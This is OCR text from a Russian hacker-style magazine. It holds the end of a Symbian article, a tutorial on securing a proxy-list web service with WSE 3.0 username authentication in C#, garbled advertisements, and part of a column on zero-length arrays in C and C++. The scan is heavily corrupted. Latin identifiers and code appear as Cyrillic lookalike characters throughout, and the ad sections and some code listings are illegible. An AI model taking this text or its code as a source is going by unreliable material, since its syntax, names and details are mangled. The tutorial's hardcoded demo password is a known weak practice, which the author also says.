Здесь мы инициализировали строковый дескриптор ІР именем файла 
базы данных, после чего создали строковый Ьеар-дескриптор, в 
который записали содержимое этого файла. Метод Ріпсі дескрипторов 
используется для поиска подстроки и возвращает позицию, в которой 
подстрока встречается в базе, либо КЕггЫоіРоипсІ (что есть ноль), если 
подстроки нет. Вот и все, программа готова! 

К ЗАКЛЮЧЕНИЕ 

После прочтения этой статьи ты наверняка вставишь ОѴй в дисковод, 
откроешь сорцы, заваришь чайку и погрузишься в состояние глубокого 
внутреннего спокойствия. Еще бы! Ведьтеперьты сможешь мирно 
спать каждую ночь, и твой чуткий сон больше не потревожатзвонки 
оголтелых фанаток! Ибо все лишние леди у настеперь в черном! Сего- 
дня мы еще раз убедились, что смартфон — это настоящий компьютер и 
писать для него одни лишьтетрисы и змейки — редкое расточительство. 
Мы — за настоящий, юзабельный софт! Вроде этой программки, ц-ц 
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ІНИКОЛАЙ БАЙБОРОДИН! 



ПОДНИМАЕМ ПРИВАТНЫМ ВЕБ-СЕРВИС 



Сегодня термин ѴѴеЪ 2.0 не упоминают в своих разговорах разве что бабушки в «бу- 
лошной». Невольно возникает ощущение, что шумиха, раздутая вокруг него, на самом 
деле искусственна. Но, с другой стороны, в технологии ѴѴеЪ 2.0 серьезные корпорации 
вкладывают еще более серьезные деньги. Значит, что-то все-таки в нем есть. И, если это 
действительно не пустышка, выдуманная маркетологами, почему бы и нам не взять на 
вооружение некоторые из его технологий? Например, веб-сервисы... 



Н ГРЯЗНЫЕ СЕРВИСЫ 

Наверняка ты уже слышал о парадигме «Приложения как сервисы». Дейс- 
твительноудобно, когда нет необходимости грузить себя проблемами сов- 
местимости программного обеспечения и производительности аппаратной 
части. Раз та к, то почему бы и тебе не воспользоваться их преимуществами? 
Вариантов может быть множество — я не стану читать тебе проповедь о 
моральной стороне вопроса. По большому счету меня совершенно не ин- 
тересует, где и какты собираешься применять рассмотренные технологии. 
Цель этой статьи совершенно в другом — втом, чтобы обратить внимание 
на вопрос защиты создаваемых сервисов. Эта тема многогранна и при всем 
желании не уместится в рамки журнальной статьи. Поэтому я предлагаю 
остановиться на одном аспекте безопасности, а именно на взаимодействии 
веб-сервиса с системой аутентификации пользователей. 



Эй, кто сказал, что автор — зануда и дальше будеттолько скучная тео- 
рия? Вовсе нет! В качестве практического примера мы замутим сервис, 
который будет предоставлять пользователям (то есть тебе и твоим друзь- 
ям) в соответствии с определенными параметрами (например, с геогра- 
фической локализацией) адреса прокси-серверов из твоего приватного 
списка. Естественно, проксик проксику рознь, и адреса самых вкусных 
из них нужно хранить под замком, а это значит, что веб-сервис, который 
будет рулить таким списком, должен уметь ограничивать доступ хотя бы 
по такому банальному критерию, как имя пользователя и пароль. 

В МЕТОДЫ ОБЕСПЕЧЕНИЯ ПРИВАТНОСТИ 

Вопросы безопасности веб-сервисов регулируются одним из стандартов 
некоммерческой организации 0А5І5, который называется (кто бы мог 
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со^іпд 




увесистого пинка как производительности сервиса, так и простоте 
восприятия его исходников твоими друзьями. 

Ладно, не буду больше терзать тебя догадками, а расскажу, как дела- 
ют приватными свои сервисы серьезные господа. А делают они это с 



Что-то меня поддостал этот ѴѴеЬ 
2.0. Все только и трындят об этом, 
толком не понимая, где ѴѴеЬ 1.0 
и почему нет версии 1 .5. Это же 
нестрогое понятие, которому даже 
сложно дать четкое определение! 



Да ладно тебе, не горячись. 
Статья актуальная, вебсервисы — 
замечательный механизм, который 
еще не исчерпал свой потенциал. 
Думаю, скоро в журнале будет статья 
и про последние разработки боодіе 
и АбоЬе в анализе медиаконтента и 
контекстного ресайзинга. 



Окно свойств ѴѴ5Е 



подумать] ѴѴ5-5есигіІу. Мы будем иметь дело с реализацией ѴѴ5-5есигі1у 
от компании МісгозоЛ, а именно с версией ѴѴ5Е 3.0, которая прекрасно 
работает в связке с ЮЕ Ѵізиаі 5іисІіо. 

Существует несколько способов обеспечения безопасности. Самый 
простой из них — это обмен данными через 55 1_ совместно с исполь- 
зованием сертификатов на стороне клиента, гарантирующим, что 
потенциальный потребитель услуг обладает достаточными полномо- 
чиями для взаимодействия с ним. Недостаток этого метода, какты уже 
догадался, кроется в необходимости организации управления серти- 
фикатами. К тому же никто не отменял такую разновидность атаки, как 
тап-іп-іИе-тісІсІІе. Так что это не наш метод. Другой подход заключа- 
ется в том, чтобы осуществлять процесс идентификации пользователя 
одновременно с процессом удаленного вызова процедур. Чтобы лучше 
понять принцип действия последнего способа, представь, что у нашего 
веб-сервиса есть такой метод, который, приняв в качестве параметра, 
допустим, АЫ5І-сокращение наименования страны, отправляет клиенту 
ответ, содержащий список валидных приватных проксиков, находя- 
щихся именно в этой стране. Прототип этого метода будет выглядеть 
следующим образом: 

риЫіс Збгіпд[] СебРгохуЫзЕ (ЗЕгіпд соигЩгу) 

Для того чтобы отрубить разным халявщикам доступ к нашему сервису, 
достаточно внести минимальные изменения в приведенный выше метод: 

риЫіс ЗЕгіпд [ ] СеЕРгохуЬізЕ (Збгіпд соипЬгу, 

изегпате, раззѵгогсі) 

Недостаток подобного подхода очевиден: передаваемые удаленному 
методу параметры изегпате и раззѵѵогсі сможет перехватить даже 
пионер, и вся защита пойдет лесом. Атеперь возьмем два предыдущих 
подхода и тщательно их перемешаем до образования однородной мас- 
сы. Полюбуйся на результат — коктейль 55И & НРС, название которому 
можешь придумать сам. 

Но и в этом случае нас ждет нехилая засада. Во-первых, еслиты плани- 
руешь открыть дверь в большой мир через несколько веб-сервисов, ты 
должен не забыть подобным образом защитить каждый из публичных 
методов. Крометого, при таком подходе мы засоряем все публичные методы 
лишними данными и лишним программным кодом, тем самым давая 



Проверка пользова- 
тельских данных 

изіпд ЗузЕеш; 
изіпд ЗузЕеш.ХшІ; 

изіпд Місгозоіі: .МеЪ. ЗегѵісезЗ . ЗесигіСу .Токепз; 

патезрасе ѵгоЪ . зесгіЬу . зегѵісез 
{ 

риЫіс сіазз СизСотИзетатеТокепМападег : 

И з егпашеТокепМападег 
{ 

риЫіс СизЫтИзегИатеТокепМападег ( ) 

{ 

} 

риЫіс Сиз ЫтИз егпашеТокепМападег (ХтІЫосіеЬізІ: 
посіез) 

: Ъазе (посіез) 

{ 

} 

ргокесЕесІ оѵеггісіе зЕгіпд АиЕЬепЫсабеТокеп (Изегп 
ашеТокеп Ьокеп) 

{ 

зкгіпд раззѵгогсі; 

зѵгіСсЪ. ( Рокеп . Изегпате . ТоЬоѵ/ег ( ) ) 

{ 

сазе "паЪ" : 

раззѵгогсі = "ѵ/зеЗ " ; 

Ьгеак; 

(іаіаиІС : 

раззѵгогсі = " ! " + Сокеп. Раззѵгогсі; 

Ьгеак; 

} 

геСигп раззѵгогсі; 

} 

} 

} 
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> Ііпкз 

Веб-сервисы далеко 
не ограничивают- 
ся технологиями 
М іеговой. Для того 
чтобы убедиться в 
этом, посети сайт 
ѵѵѵѵѵѵ.іЬт.сот/ 
беѵеіорегѵѵогкз/ги . 




> СІѴСІ 

На диске лежат 
исходные коды веб- 
сервиса и клиента, 
для сборки которых 
тебе понадобится 
МісгозоЙ Ѵізиаі 
Біисііо с установлен- 
ным пакетом ѴѴБЕ. 




/«V 



> ІГгіО 

Кроме аутентифика- 
ции пользователей 
веб-сервисов ѴѴБЕ 
предлагает ряд 
других не менее 
эффективных инст- 
рументов, включая 
систему управления 
сертификатами, 
публикацию ключей 
и проверку целост- 
ности 50АР- 
сообщений. 




помощью самых что ни на есть подручных средств — мыла 
и веревки. Хотя нет, веревка нам сегодня не понадобится. 
Обойдемся одним мылом. Или кактам оно будет на буржуй- 
ском международном? Правильно, 50АР. «И в чем же тут 
фишка?» — разочарованно спросишь ты, а я таки имею от- 
ветить! Всю информацию, используемую для аутентифика- 
ции, мы уберем с глаз долой в заголовок БОАР-сообщения. 
Все публичные методы спрячем за гейткипером, который 
будет обрабатывать БОАР-заголовок и, в зависимости от 
того, понравился ему посетитель или нет, пропускать запрос 
внутрь нашей цитадели зла или посылать в аут, как это 
делал Овчинников с зенитовскими мячами в свои лучшие 
годы. 

0 ПИШЕМ! 

Итак, цель ясна и сформулирована — поднять веб-сервис, 
требующий от пользователя аутентификации с помощью 
логина и пароля. Проверка соответствия пароля эталонному 
образцу должна проходить до того, как управление будет 
передано основным методам сервиса. Приступим. Хотя нет, 
постой — еще пару слов в качестве напутствия. Очень важ- 
но, чтобы ты понимал, что цель этой статьи состоит в том, 
чтобы познакомить тебя с одним из аспектов защиты веб- 
сервисов. Приведенный пример не стоит рассматривать как 
готовое решение. Прежде всего это пища для размышле- 
ния, которая должна подтолкнуть тебя к разработке серьез- 
ной комплексной защиты. Найди в этом предложении слово 
«комплексной», вырежи его и пришли мне, тебя ждет приз. 
Шутка — просто подчеркни его и запомни, так как комплекс- 
ный подход — это альфа и омега любой защиты. 

В качестве среды разработки мы будем использовать Ѵізиаі 
Біисііо совместно с пакетом Місгозо^ ѴѴ5Е 3.0, который 
доступен для свободного скачивания по адресу ууууу\л 
тісгозоШсот/сІоѵѵпІоасІз . 

Это расширение обеспечивает различные способы защиты 
как межсервисных коммуникаций, так и защиты взаимо- 
действия клиентского приложения с веб-сервисом. 

С установкой ѴѴ5Е у тебя проблем возникнуть не должно. В 
результате, вызвав контекстное меню любого из проектов, 
ты увидишь новый пункт в самом низу списка, открывающий 
диалоговое окно настройки параметров ѴѴБЕ. 

Запускаем Ѵізиаі Біисііо и создаем новое решение, присво- 
ив ему имя, скажем, РгохітаІеБегѵісе. 

Щелчком правой кнопки мыши по только что созданному 
решению в окне Боіиііоп Ехргоіег вызывай контекстное 
меню и добавляй новый веб-сайт. Кстати, я надеюсь, ты 
знаком с языком С#? Если нет — бегом восполнять пробел. 
Но сильно не напрягайся, если твои знания пока еще 
поверхностны. Нам понадобятся только самые основы. 




Архитектура ѴѴБЕ 







Всю грязную работу на себя берет ѴѴБЕ, проведя кзаветной 
цели через цепочку визардов (понимаю твое возмущение, 
но «Вам шашечки или ехать?»]. А если вдругтебя всерьез 
заинтересует создание веб-сервисов, то учти, что на этом 
балу музыку заказывают два короля: С# и ^ѵа. Подружись с 
одним из них — и жизнь твоя будет в шоколаде. Не хуже, чем 
у Ксении Собчак. У нас есть решение, есть проект. Чего еще 
не хватает? Правильно, не хватает веб-сервиса. Назовем 
его РгохуЕізЮеиег. 

В списке ресурсов сервиса прежде всего нуж- 
но переименовать созданный АБМХ-файл в 
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РгохуІ_ів{6е1:1:ег5егѵісе.азтх. Теперь открываем его в окне редак- 
тора и меняем автоматически сгенерированный код на свой. В 
качестве отправной точки можешь использовать пример, приве- 
денный во врезке. Подробно комментировать этот пример не имеет 
смысла, так как его исходный код примитивен и понятен даже тому, 
кто правой рукой за компилятор ни разу не держался. С другой 
стороны, если ты уже знаком с языком С# и используешь его для 
создания веб-сервисов, то ты наверняка заметил, что в приведен- 
ном примере, помимо импорта стандартных библиотек: Бузует, 
БузІет.ѴѴеЬ и БузІет.ѴѴеЬ.Бегѵісез, появилась еще одна библио- 
тека — МісгозоН.ѴѴеЬ.Бегѵісез. Она содержит, в частности, класс 
Роіісу, который нам предстоит позднее использовать для указания 
метода аутентификации. 

^ ДОБАВЛЯЕМ ПОЛИТИКУ БЕЗОПАСНОСТИ 

После того как создан работоспособный сервис, его необходимо защи- 
тить от дикой стаи леммингов, предпочитающих все получать на халяву, 
не приложив даже небольших физических и умственных усилий. 

Жмем правой кнопкой мыши по проекту в окне Боіиііоп Ехріогег и в 
контекстном меню выбираем пункт ѴѴ5Е БеШпдз. На первой закладке 
открывшегося окна свойств нужно выбрать обе опции для того, чтобы 
разрешить использование ѴѴБЕ и внести соответствующие изменения 
в форматБОАР-сообщений. Далее переходим на закладку Роіісу. С 
помощью чекбокса активируем использование политики, после чего 
жмем кнопку АбсІ/«Добавить» и вводим имя создаваемой политики 
безопасности. 

Вот мы и добрались до горячо любимых тобой (на уровне подсознания, 
разумеется) визардов. На первой странице не задумываясь дави кнопку 
Ыехі. На следующем шаге нужно выбрать сервис, к которому будет при- 
менена политика, и указать используемый метод аутентификации — нас 
пока интересует только ІІзегпате — его и выбирай. После этого снова 
жми кнопку Ыехі. 

Теперь нужно убедиться в том, что расширение ѴѴБ-Бесигііу активиро- 
вано, а первая опция в секции Ргоіесііоп Огбег сброшена. Все, можно с 
чувством выполненного долга жать на кнопку РіпізЬ. 

Еще не мешало бы проверить работоспособность системы аутентифика- 
ции. Для этого на вкладке Оіадпозіісз нужно активировать трассировку 
проекта. В процессе трассировки будут использоваться два файла 
— один для входящих запросов, а другой для исходящих ответов (со- 
гласись, очень удобная штуковина, позволяющая не только отлаживать 
работу своих сервисов, но и изучать все премудрости веб-программи- 
рования на примере сервисов, созданных другими разработчиками). 

В последний раз жмем ОК. Но это еще не все. Мы создали политику ау- 
тентификации, теперь нужно прикрутить ее к нашему сервису. Для этого 
опять переходим к окну редактора кода и куже имеющимся атрибутам 
сервиса добавляем еще один — Роіісу: 

[ДОеЪЗегѵісе (Иашеврасе = "ЪЦЦр: //ѵгеЪ. зесгіЦу . 

зегѵісез/ " ) ] 

[МеЪЗегѵісеВіпсІіпд (СопЕогшзТо = МзіРгобіІез . 

ВазісРгоЕі1е1_1 ) ] 

[Роіісу ( "ЗегѵегРоІісу " ) ] 

Что изменилось? Смотри. Если теперь открыть файл ѵѵеЬ.сопбд, то в нем ты 
найдешь секцию <тісгозоіі.ѵѵеЬ.5егѵісе53>, состоящую из ссылки на файл 
политики безопасности и указания пути, по которому будут располагаться 
файлы диагностики. 

ФРАГМЕНТ ФАЙЛА ѴѴЕВ.СОМРІО 

стісгозобі: .ѵгеЬ. зегѵісезЗ> 

<ро1ісу ІіІеЫате = "ѵ/зеЗроІісуСасІіе . сопіід" /> 
<(ЗіадпозЦісз> 

<Цгасе епаЫед = "Цгие" іприЦ = "ІприЦТгасе. 

Ѵ7е Ьіпбо" оибриЦ - "ОиЩриЬТгасе . ѵ^еЬіпбо" /> 

</сІіадпозЦісз> 

</шісгозоіЦ .ѵ?еЪ. зегѵісезЗ> 



ШШШ 



і.:і кип ишн ш'і з г 4.1 и с ,і іи нлс г имл шщіік ус.'и і :і 



КОСТИНГ 

! Ч \ \і»сі іііи : 

1 




вѵціппвг 



ЛаДОВДірЬ. но 

ІП>. ЯаЙГк. г МѴ 5 СН. № Ог ЯП 
2 ГВ, 3 слЯпо*. 5 МуЗОІ. Ьи йіМі^ 

огФ, іи ѵш. іи ии аі ] 



Се кснн планами іиінъл* упрощени я І^ Рт.ін-М^ г 

) ВИРТУАЛЬНЫЕ 

ВЫДЕЛЕННЫЕ СЕРВЕРЫ: 



Ллаты 


Параимры 


Цпгіа 


514 И 


2 ГО, ІІ Ѵі ПАМ, ЭОСЪ 


> 


ЗілгкГ-агЕ 


ІГО, іямь НАМ, -«ИСь 


О Г МО г, я 


аихіпоЕ-і 


10 Г 6 , і«иьпАМ. «№ін 4 нж 


□г эгя 


Юд«>н «»4 ГѴс.і 


1 5 Г 6 . ИбМЬ ПАМ. 15006 ІрйеЬ» 


Ог 1 ЭО& руП. 



.ІОІИ'.ІІѴІ ГСНіІИ* НІ 4 прс.і/іігин 
■ипсль упраплсннв іК 1 *іп:іл.іі;і!т 2 ( КІ |ліѴ ѵііс. 

♦Ди тлит ипі г 40 гп|іі і л ^ цадиілш— 

■8’ЕЙЯИЙіы'і Ефимія» юн план (гііинлі Вселены 

РКЛИЧАГОТ 

пр*і інілате іа б чй-. і."Кіі і.к ,і I Ф .•■і; ц ц- 

праі оаі.ите и ! Ій.1 Сь н іки 



* РЕГИСТРАЦИЯ ДОМЕНОВ 



Іи. регігс'1'рн.ціі кі ламинин 

.сот , по 4 ( -Ьіх г .огд 

ІИ Ь'І (і .ЧК I Гн./и:», | Т ІІДС 

Регистрируем домены л 5 И+ завіх: 
Ги іпіо ди ас ад эпи аі Ье Ъ'і рі Ьг сп 
оо.ик сот зд сіе Іт деп.іп да іп іо ір Іа 
тгі т&.ик тз пи аі зс ае зІТ; Іс ѵд і/мз. 



9 ВЯНАНСИІІ^^ 

- Системный администратор 

- Помощник сисадмина 
техподдержка 

- ВеБ-пр-ограмнСг. 



Высокія таріы ілпі, г ! 
годаішш кшюентпив, 
система бол/ем 




Звоните! Тел. (495) 788-94-84 
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Выбор режима работы ѴѴ5Е 

Теперь не мешало бы разобраться с самим файлом политики безопасности. 
В нем присутствует раздел ЭегѵегРоІісу. Именно из этого раздела сервис 
и узнает, что, прежде чем покорно отдать пользователю заветный список 
приватных проксиков.уэтого самого пользователя не мешало бы поинте- 
ресоваться, кто он и с какой целью пожаловал. Если переходить на термины 
информационной безопасности, то созданная нами система защиты — это 
пока даже не аутентификация, а идентификация. Еще хотелось бы обратить 
внимание натотмомент, что мы не использовали шифрование. Сделано 
это опять-таки осознанно — чтобы не уходить от основной темы статьи. Это, 
однако, вовсе не означает, что приватная информация будет передаваться 
в открытом виде, ни в коем случае. Просто этот аспект защиты мы перено- 
сим натранспортныйуровень, шифруя весьтрафикс помощьютого же 55Е. 
Если тебе этого недостаточно и ты знаком с основными криптоалгоритмами, 
написать их реализацию на С# для тебя труда не составит. 

В общем случае содержимое такого файла будет выглядеть следующим 
образом: 

<ро1ісу паше = "ЗегѵегРоІісу "> 

<изегпате0ѵегТгапзрогкЗеспгіку /> 
<гедиігеАсбіопНеасіег /> 

</ро1ісу> 

^ СОВЕРШЕНСТВУЕМ ЗАЩИТНЫЙ МЕХАНИЗМ 

Вот та к незаметно мы перевалили за середину статьи, а надежной 
защиты веб-сервиса у нас по-прежнему нет. Почему? Да потому, что, 
добавив механизм аутентификации, мы закрыли доступ к сервису 
только анонимным пользователям. Это означает, что любому желаю- 
щему за юзать наш приватный список прокси-серверов достаточно 
подключиться к сервису, использовав любой логин, какой только может 
выдумать его воспаленный ожиданием легкой наживы мозг. Поэтому 
следующая наша задача — обеспечить доступ к сервису только избран- 
ным, а остальных послать туда, куда не доходят ІСМР-пакеты. Для этого, 
во-первых, нужно создать класс, являющийся наследником класса 
Місгозоі'ЕѴѴеЬ.ЭегѵісеБЗ.ЭесигіІу.ТокепБизегМатеТокепМападег. 
Во-вторых, этот класс нужно зарегистрировать в качестве ресурса веб- 
сервиса. Следовательно, добавляем к решению новый проект. Назовем 
его ЭесигкуНеІрег. Тип создаваемого класса — библиотечный (ІіЬгагу). 



Защита на уровне протокола 




Защита на уровне сообщения 




Два подхода кзащите веб-сервисов 



Переименовываем класс в нечто соответствующее общему контексту, 
например в СиБІотІІБегТокепМападег.СБ, и меняем шаблон исходного 
кода этого класса на код, приведенный во врезке. 

Как видишь, исходник опять достаточно очевиден и в особых коммен- 
тариях не нуждается. Отдельно, пожалуй, следует обратить внимание 
на то, что в самом начале мы объявляем использование нестандарт- 
ной библиотеки: изіпд МісгозоІЕѴѴеЬ.ЭегѵісеБЗ.Эесигку.ТокепБ. Эта 
библиотека как раз и содержит в себе класс, являющийся предком 
СиБІотІІБегТокепМападег.сБ. 

Теперь подскажем веб-сервису, что впредь при обработке поступаю- 
щих запросов ему нужно руководствоваться усовершенствованным 
механизмом аутентификации. Для этого необходимо добавить секцию 
зесигйу в файл ѵѵеЬ.сопбд, что можно сделать двумя способами: либо 
воспользоваться очередным мастером, либо написать соответствую- 
щий код своими руками. Давай пойдем вторым путем, ты ведь знаешь, 
сколько ненужной шелухи остается после работы генераторов кода на 
основе шаблонов. 

ДОБАВЛЯЕМ НОВЫЙ МОДУЛ Ь В ФАЙЛ ѴѴЕВ.СОМРІО 

<шісгозобі: . ѵ?еЬ. зегѵісезЗ> 

<ро1ісу бі1еЫаше="ѵ7зеЗро1ісуСас1іе.сопбід /"> 
<зесигіДу> 

<зесигіДуТокепМападег> 

<аскЗ Еуре= "меЪ . зесгіру . зегѵісез . СизЕошІІзегпа 
шеТокепМападег , ЗесигікуНеІрег " патезрасе= "кССр : // 
сЗосз . оазіз-ореп. огд/мзз /2 004/ 01/оазіз-2 0040 1-ѵ?зз- 
мззесигіЬу-зесехЦ-1 . 0 .хзсі" 

1осаІКате= "ІІзегпашеТокеп" /> 

< / з есиг і СуТокепМападег > 

</зесигіЬу> 

Все. Веб-сервис с аутентификацией пользователей готов. Надеюсь, 
основные принципы его создания ты уловил итеперьсможешьдорабо- 
тать приведенный пример, что называется, под себя. Мне остается только 
подсказать некоторые моменты, которые обязательно надо учитывать 
при создании реально работающего приватного сервиса, но которые 
мы не стали рассматривать по причине ограниченности журнального 



Основной момент, на который стоит обратить внимание, — это формат запроса, 
который должен включать в себя помимо основных аргументов еще и два дополни- 
тельных: логин и пароль. 



► 124 
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АѴегМедло 

ѵѵѵѵѵѵ.аѵегтесііа.ги 




пространства. Во-первых, какуже упоминалось, не мешало бы обеспечить шифрование переда- 
ваемой между веб-сервисом и клиентом информации. Можно даже реализовать соответствующую 
функцию самостоятельно. Но, на мой взгляд, наиболее эффективным решением будет правильный 
выбор сетевого протокола — например, просто посади свой сервис на 55І_. Во-вторых, мы очень 
жестко обошлись со связкой «логин — пароль», организовав их хранение непосредственно в 
программном модуле, что не есть гуд. Поэтому было бы нелишним вынести их за пределы сервиса 
и, например, держать, как и все нормальные люди, в базе данных или в крайнем случае просто в 
отдельном файле. И, в-третьих, хорошо бы хранить не сами пароли, а их хэш-функции. 




СЕКТІРІЕЭ РОК 

ѴѴІПСІОѴѴ5 

Ѵізіа™ 



АѴегТѴ Зіиаіо 509 



Вы готовы к 
цифровому ТВ ? 



^ КЛИЕНТСКИЕ РАЗБОРКИ 

В процессе функционирования клиента для только что созданного веб-сервиса нет ничего осо- 
бенного. Основной момент, на который стоитобратить внимание, — это форматзапроса, который 
должен включать в себя помимо основных аргументов еще и два дополнительных: логин и пароль. 
Да, и не забудь при создании клиента подключить библиотеку, обеспечивающую работу с политика- 
ми безопасности веб-сервиса: 

изіпд МісгозобС .Ѵ7еЬ. ЗегѵісезЗ . ЗесигіСу .Токепз; 



Полный спектр мультимедиа 
возможностей - функция ІЮ5, 
объемный звук, регулировка 
тембра 

Передовая модель тюнера 
РИіІірз с функциями объемного 
звука и регулировки тембра 



Прежде чем передать веб-сервису запрос, содержащий в себе параметры аутентификации 
пользователя, их необходимо соответствующим образом подготовить. Делается это через объект 
ІІзегпатеТокеп: 

изегпашеТокеп Докеп = пем ІІзегпатеТокеп (изег, раззѵ/огсі, РаззѵгогсЮркіоп. 
ЗепсІРІаіпТехі: ) ; 

Обращение клиента к веб-сервису начинается также с создания соответствующего объекта: 

РгохітаДеЗегѵісе . РгохуЬізДСеДДегЗегѵісе ргоху = пем РгохітаДеЗегѵісе . 
РгохуЬізДСеДДегЗегѵісе ( ) ; 

После этого передаем ему в качестве параметра функции ЗеіСІіепЮгесІепбаІ объект 
ІІзегпатеТокеп. Так как пакет ѴѴ5Е предусматривает возможность создания в рамках одного веб- 
сервиса нескольких политикбезопасности, при формировании запроса необходимо указать имя 
той политики, которой будут обрабатываться передаваемые параметры: 

ргоху . ЗеДРоІісу ( "СІіепДРоІісу " ) ; 

Дальше могут идти стандартные запросы к интерфейсам веб-сервиса — все какобычно. Если с 
созданием клиента утебя вдруг возникнут трудности, можешь посмотреть и взять за основу исход- 
ники, выложенные на диске, ц-ц 




• Полный спектр мультимедиа 
возможностей -объемный 
звук / регулировка тембра 

• Передовая модель тюнера 
РГііІірз с функциями объемного 
звука и регулировки тембра 
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■КРИС КАСПЕРСКИ 



Трюки 
от крыса 

СЕГОДНЯ МЫ ПОГОВОРИМ О СТАТИЧЕС- 
КИХ/ДИНАМИЧЕСКИХ МАССИВАХ НУЛЕ- 
ВОЙ ДЛИНЫ. «А РАЗВЕ БЫВАЮТ ТАКИЕ?» 

- СПРОСИТ НЕДОВЕРЧИВЫЙ ЧИТАТЕЛЬ. 
НЕ ТОЛЬКО БЫВАЮТ, НО И УТВЕРЖДЕНЫ 
СТАНДАРТОМ, АТАКЖЕ АКТИВНО ИС- 
ПОЛЬЗУЮТСЯ ВСЕМИ, КТО О НИХ ЗНАЕТ. 

статические массивы на стеке 

\9 I Зачем может понадобиться создавать статический массив нулевой 
длины? Ведь выражениетипа «сбагс[0]» не имеетсмысла! Однако... в неко- 
торых ситуациях оно бываеточень даже полезно. Допустим, мы имеем опре- 
деление 0АТА_1_ЕЫ с допустимыми значениями отО (по баіа) до... ХХІ_. Тогда 
конструкция «сЬагсЮАТА_І_ЕМ]» при 0АТА_ЕЕЫ == 0 приведет к ошибке 
компиляции, даже если мы не собираемся обращаться к массиву «с» по ходу 
исполнения программы. Аусложнять алгоритм, добавляя лишние ветвления 
и загромождая листинг командами препроцессора, не хочется. 

Вся хитрость в том, что если обернуть статический массив структурой, 
то компилятор проглотитее не задумываясь! Как разто, что нам нужно! 
Рассмотрим следующий код: 

СТАТИЧЕСКИЙ МАССИВ НУЛЕВОЙ ДЛИНЫ НА СТЕКЕ 

#(ТеТіпе БАТА_ЬЕЫ 0 // нет данных 

// структура со статическим массивом нулевой длины 
зСгисЫ 2ЕКО 
{ 

сііаг с [БАТА_ЬЕЫ] ; // массив нулевой длины 

} ; 

шаіп ( ) 

{ 

// объявляем структуру с массивом нулевой длины 
зЫгисЫ 2ЕР.0 гего; 



Этот код компилируется всеми компиляторами без исключения, причем 
работает он правильно (хотя и не обязан этого делать). В частности, при 
компиляции Си-программы, МісгозоК Ѵізиаі С ++ утверждает, что размер 
структуры 2ЕР0 равен 4 байтам, но если изменить расширение файла с «.с» 
на «.срр», мы получим... 1 байт. 

6СС во всех случаях дает нам 0 байт, чтологично, но неправильно, поскольку 
все 32-битные компиляторы реально резервируют как минимум 4 байта под 
локальные переменные любых видов, поскольку это необходимо для вырав- 
нивания стека (и дизассемблерные листинги наглядно подтверждают это!). 
Следовательно, мы можем не только создавать статические массивы 
нулевой длины, но еще и (пускай не без предосторожностей) использовать 
их. Например, в качестве вступительных тестов для новичков. Шутка! Но 
некоторая доля истины в ней есть. Обычно программисты, не желающие, 
чтобы их отстраняли от проекта, добавляют в исходный код немного «чер- 
ной магии». Программа работает вопреки здравому смыслу и совершенно 
непостижимо для окружающих. 

А вот если переместить структуру 2ЕР0 в статическую область памяти 
(секцию данных),то место, резервируемое под массив нулевой длины, 
сразу же уменьшится до 1 байта, а поскольку выравнивать переменные в 
статической памяти нет никакой необходимости, то в нашем распоряже- 
нии останется по меньшей мере 1 байт, который можно задействовать под 
производственные нужды. 

динамические массивы на куче 

Функции семейства таІІосП обязаны корректно обрабатывать 
нулевой аргумент, возвращая валидный указатель на блок памяти 
нулевой длины. Вот что говорит М50М по этому поводу: «К зіге із 0, таііос 
аііосаіез а гего-ІепдіЬ Кет іп Ібе Ьеар а псі геіигпз а ѵаіісі роіпіегіо Ібаі 
Кет» (Если размер [выделяемой памяти] равен нулю, функция таііос 
выделяет блок памяти нулевой длины в куче и возвращаетуказатель на 
него). То есть создавать массив нулевой длины на куче мы можем без 
всяких извращений со структурами. Воттолько обращаться к созданно- 
му массиву (по стандарту) не можем никак. Стандарт допускаеттолько 
проверкууказателя на ноль, сравнение двух указателей, освобождение 
памяти, ну и, естественно, реаллокацию. Однако стандарт предполагает, 
а компилятор располагает. 

Давай выясним: сколько же всего в действительности выделяется байт при 
создании массива нулевой длины? 

ИЗМЕРИТЕЛЬНЫЙ ПРИБОР, ОПРЕДЕЛЯЮЩИЙ РЕАЛЬНЫЙ РАЗМЕР 

МАССИВОВ НУЛЕВОЙ ДЛИНЫ 

#йеТіпе БАТА_ЬЕЫ 0 // нет данных 







ѣ 




// выводит указатель на созданные блоки на 

экран 

ргіпбі: ( " 0 %X] 1 \п 0 %X 11 \п 0 %X] 1 \п\п 0 %X] 1 \п 0 %X} 1 \п 0 %X] 1 \п ,, , 
рі, р2 , рЗ , р4, р5, рб) ; 

} 



Откомпилировав программу с помощью МісгозоЙ Ѵівиаі С++ и запустив ее 
на выполнение, мы получим следующий результат: 



РЕАЛЬНО ВЫДЕЛЯЕМЫЙ РАЗМЕР ДИНАМИЧЕСКИХ МАССИВОВ 


030050011 


; \ 


03004Р0І1 


; +- указатели на блоки нулевой длины 


03004Е0І1 


; / 


03004Б0І1 


; \ 


03004С0Й 


; +- указатель на блоки длиной в 1 байт 


03004В0І1 


; / 



Как видно, адреса выделяемых блоков планомерно уменьшаются на 
1 0б байт, следовательно, каждый блок (состоящий из массива и служебных 
данных) занимаетнамного больше, чем ничего. Болеетого, вызов таІІос(О) 
эквивалентен таііос, (1). Определить размер актуальных данных динами- 
ческого массива несложно. Достаточно увеличивать аргумент, переда- 
ваемый таііос до тех пор, пока разница между соседними указателями 
скачкообразно неувеличится на некоторую величину. 
Экспериментпоказывает, что минимальный размер выделяемого блока для 
Місго50ЙѴІ5иаІС++ и 32-битных версий 6СС составляет 1 0б байт, то есть 
таІІос(О) работаетточнотакже, как и таІІос(ОхР). Естественно, никаких га- 
рантий, что остальные компиляторы поведутсебя аналогичным образом, у 
нас нет и никогда не будет, поэтому вылезать за границы отведенного блока 
в любом случае не стоит. 

С другой стороны, выделив большое количество динамических массивов 
нулевого размера, не следует надеяться, что они не занимают драгоценной 
памяти и потому их можно не освобождать. Освобождать их нужно, иначе 
память будет утекать со страшной скоростью! 



^ оператор пеѵѵ 

Практически все известные мне компиляторы Си++ реализуют 
оператор пеѵѵ на основе таііос, поэтому все сказанное о таІІос(О) спра- 
ведливо и для пеѵѵ(О). Однако... кое-какие различия все-таки наблюда- 
ются, и мне бы хотелось обратить на них внимание читателя. 

Прежде всего откроем Стандарт (смотри «С++ Ргодгаттіпд Бапдиаде, 
Бесопсі Есііііоп», секция 5.3.3), где Дохлый Страус прямо так и пишет: 
«Тбіз ітрііез Ібаі ап орегаіог пеѵѵ() сап Ье саііесі ѵѵііб Ібе агдитепі 2 его. 

Іп Ібіз сазе, а роіпіегіо ап обіесі: із геіигпесі. Еереаіесі зисб саііз геіигп 
